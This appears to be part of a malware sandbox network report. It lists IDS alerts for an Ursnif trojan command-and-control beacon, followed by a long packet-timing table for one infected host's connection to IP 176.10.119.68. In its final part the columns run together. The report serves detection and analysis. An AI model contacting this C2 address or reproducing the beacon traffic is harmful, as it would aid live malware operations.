Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/26/22-04:06:31.790854 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49743 | 80 | 192.168.2.3 | 13.107.42.16
05/26/22-04:06:53.058632 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49752 | 80 | 192.168.2.3 | 176.10.119.68
05/26/22-04:06:53.058632 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49752 | 80 | 192.168.2.3 | 176.10.119.68
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 26, 2022 04:06:52.060287952 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.072685957 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.072798014 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.073632002 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.086468935 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.343399048 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.343425989 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.343440056 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.343517065 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.343854904 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.343890905 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.343904972 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.343909979 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.343935013 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.344276905 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.344316006 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.344330072 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.344345093 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.344388962 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.344424963 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.344470024 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.344547987 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.344567060 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.344579935 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.344593048 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.344623089 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.344721079 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.344774008 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.356909990 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.357070923 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.357367039 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.357388973 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.357405901 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.357419014 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.357441902 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.357506037 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.357597113 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.357635975 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.357647896 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.357669115 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.357677937 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.357682943 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.357709885 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.357840061 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.357858896 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.357875109 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.357887983 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.357920885 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.357949018 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.358002901 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.358036041 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.358050108 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.358055115 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.358068943 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.358078003 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.358117104 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.358325958 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.358365059 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.358388901 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.358405113 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.358416080 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.358417988 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.358447075 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.370215893 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.370299101 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.371227980 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.371252060 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.371268034 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.371328115 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.371368885 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.371383905 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.371387005 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.371428967 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.371567965 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.371601105 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.371619940 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.371623993 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.371646881 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.371887922 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.371906996 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.371923923 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.371941090 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.371942997 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.371956110 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.371973991 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.371975899 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.371992111 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.372004032 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.372023106 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.372050047 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.372210026 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.372240067 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.372258902 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.372260094 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.372272968 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.372286081 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.372330904 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.382575989 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.382766008 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.383284092 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.383305073 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.383322954 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.383338928 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.383352995 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.383368969 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.383416891 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.384627104 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.384645939 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.384656906 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.384722948 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.384936094 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.384954929 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.384973049 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.384990931 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.384999037 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.385009050 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.385026932 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.385039091 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.385065079 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.385107040 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.385507107 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.385529995 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.385545969 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.385557890 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.385565042 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.385581970 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.385592937 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.385601044 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.385616064 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.385639906 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.395011902 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.395083904 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.398720980 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.398741007 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.398760080 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.398772955 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.398808956 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.398844004 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.398974895 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.398992062 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.399008989 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.399024010 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.399025917 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.399058104 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.399071932 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.399090052 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.399105072 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.399116993 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.399158955 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.399415016 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.399449110 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.399475098 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.399507046 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.399513006 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.399533987 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.399550915 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.399554968 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.399569035 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.399583101 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.399590015 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.399633884 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.407273054 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.407399893 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.410657883 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.410681009 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.410706997 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.410723925 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.410726070 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.410757065 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.410801888 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.410809994 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.410829067 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.410840988 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.410852909 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.410886049 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.412228107 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.412246943 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.412262917 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.412293911 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.412303925 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.412323952 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.412332058 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.412349939 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.412358046 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.412364006 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.412386894 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.412511110 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.412528992 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.412548065 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.412556887 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.412565947 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.412583113 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.412584066 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.412614107 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.412638903 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.412641048 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.412656069 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.412683964 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.419516087 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.419605970 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.423871994 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.423897982 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.423928022 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.423949003 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.423959017 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.423968077 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.423985958 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.423986912 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.424007893 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.424026966 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.424076080 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.424094915 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.424113989 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.425947905 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.425978899 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.426003933 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.426012993 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.426023960 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.426042080 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.426043034 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.426059961 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.426074028 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.426083088 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.426105022 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.426115036 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.426157951 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.426183939 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.426207066 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.426224947 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.426240921 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.426249981 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.426269054 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.426286936 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.426290989 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.426307917 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.426312923 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.426330090 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.426333904 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.426352024 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.426371098 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.426371098 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.426383018 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.426388025 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.426409006 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.431818008 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.431963921 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.437968016 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.437995911 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.438066006 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.438092947 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.438106060 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.438112974 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.438131094 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.438144922 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.438153028 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.438182116 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
May 26, 2022 04:06:52.440613985 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.440643072 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.440661907 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.440681934 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3
May 26, 2022 04:06:52.440682888 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68
                          May 26, 2022 04:06:52.440701962 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.440721989 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.440725088 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.440730095 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.440737009 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.440792084 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.440798998 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.440855980 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.440872908 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.440916061 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.440952063 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.440968037 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.441006899 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.441426992 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.441448927 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.441468000 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.441482067 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.441483974 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.441517115 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.444192886 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.444473028 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.451466084 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.451491117 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.451508045 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.451520920 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.451575041 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.451627016 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.451776028 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.451802015 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.451822042 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.451827049 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.451841116 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.451854944 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.451863050 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.451899052 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.452234030 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.452317953 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.529841900 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.542305946 CEST8049752176.10.119.68192.168.2.3
